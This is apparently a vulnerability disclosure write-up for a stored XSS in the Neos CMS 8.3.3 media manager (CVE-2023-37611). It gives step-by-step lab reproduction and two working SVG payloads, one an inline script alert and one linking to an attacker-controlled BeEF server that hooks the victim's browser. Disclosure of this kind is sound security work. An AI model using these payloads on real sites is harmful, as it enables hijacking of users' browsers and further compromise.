CVE-2023–37611: Stored XSS In Neos CMS 8.3.3

I found a Stored XSS using SVG file in /neos/management/media of NeosCMS 8.3.3. CVE-2023–37611 has been issued my MITRE for this vulnerability.

Please see the following details.

What: Stored XSS using SVG file in /neos/management/media of NeosCMS 8.3.3 and possibly earlier versions.

Impact: A malicious user can leverage this vulnerability to hook user’s browsers and send java script commands to it interactively thus leading to further compromise of the user or users who visit this webpage

Steps to replicate:

My Lab Environment for this demo.

Kali’s IP Address: 192.168.4.2

Neo CMS’ IP Address: 192.168.4.7

Windows’ 10 IP Address: 192.168.4.8

IP of Windows 10

Step 1. Log in to the app and go to /neos/management/media, the target server is in 192.168.4.7

Step 2. Go to /neos/management/media and upload an SVG file with a Cross-site scripting payload. I used the following payload below from Payloadallthethings.

<?xml version=”1.0" standalone=”no”?>

<!DOCTYPE svg PUBLIC “-//W3C//DTD SVG 1.1//EN” “http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version=”1.1" baseProfile=”full” xmlns=”http://www.w3.org/2000/svg">

<polygon id=”triangle” points=”0,0 0,50 50,0" fill=”#009900" stroke=”#004400"/>

<script type=”text/javascript”>

alert(‘test’);

</script>

</svg>

Step 3. The image below shows the uploaded file.

Step 4. Create another user that has permission to media. Log out and login as the new user.

Step 5. As a new user, open the image to execute the payload.

To show more impact, I just copied a PoC from this blog. I will editing the payload soon :).

Step 6. Go back as a default user and create the new SVG file with a BeEF payload.

<svg viewBox=”0 0 100 100" version=”1.1"

xmlns=”http://www.w3.org/2000/svg"

xmlns:xlink=”http://www.w3.org/1999/xlink">

<image width=”30" height=”10" x=”-10" y=”10" xlink:href=”data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAMgAAADICAYAAACtWK6eAAAIQUlEQVR4nO3dPXbyOhSF4V3QpqajZATUDIA6U2AKGUWmwAjSZgipU1OnTZv+u4XwCt

[ — -base64 snipped for clarity — -]

R2Zj6wGWzz86Y+chltZ/MNFYBl/DWsDYJTaWz8EwYmwtwOL6R9/YLN4a3gN4cHCMf0kw1bti3W0LvgfGWuJFFzN978EaviQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAJ/wE8tttQUJW4rAAAAABJRU5ErkJggg==”/>

<g stroke=”none” stroke-width=”1" fill=”none” fill-rule=”evenodd”>

<a xlink:href=”http://192.168.4.2:3000/demos/basic.html">

<text font-size=”3" font-weight=”normal” fill=”#000000">

<tspan x=”1" y=”23">

Page not found, click here to return to the homepage.

</tspan>

</text>

</a>

</g>

</svg>

Step 7. In Kali, run BeEF.

Step 8. Upload the new SVG payload.

The image above shows that the new SVG file a BeEF hook payload was uploaded.

Step 9. In Windows 10, login to the CMS as the victim user and go to /neos/management/media.

Step 10. Open the new SVG file.

In this PoC the user must click the blank image.

Using this specific PoC, the victim must click the “Page not found” link but this payload may possibly be enhanced to automatically hook the browser.

Step 11. Go to Kali and check BeEF for the hooked browser.

The image shows that the victim browser is now hooked.

Recommendations: Some recommendations from Digininja against XSS on SVG are found in this link. https://digi.ninja/blog/svg_xss.php